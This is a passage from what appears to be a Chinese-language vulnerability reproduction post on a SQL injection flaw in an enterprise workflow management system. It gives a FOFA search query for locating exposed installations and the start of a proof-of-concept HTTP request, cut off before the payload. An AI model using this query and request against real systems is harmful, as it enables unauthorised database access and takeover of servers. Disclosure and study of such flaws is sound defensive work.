漏洞描述
时空智友企业流程化管控系统是一款企业信息管理软件,致力于协助大健康企业构建内部信息化,解决GSP管理、多组织管理、财务管理、税控管理、线上线下一体化等问题。 该系统可以帮助企业实现流程化管控,提高工作效率和管理水平。
目前该系统存在sql注入漏洞,攻击者通过恶意构造的SQL查询来执行未经授权的数据库操作。当应用程序未能正确验证、转义或过滤用户提供的输入数据时,攻击者可以利用这个漏洞来执行恶意的SQL语句,从而获取系统数据以及获得系统控制权限。
漏洞影响版本
版本<=11.0
FOFA:body=”企业流程化管控系统” && body=”密码(Password):”
漏洞复现
1.访问存在漏洞的网站,抓包
漏洞验证poc
POST /formservice?service=workflow.sqlResult HTTP/1.1
Host:xx.xx.xx.xx:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Connection: keep-alive
Content-Type: application/json
Accept-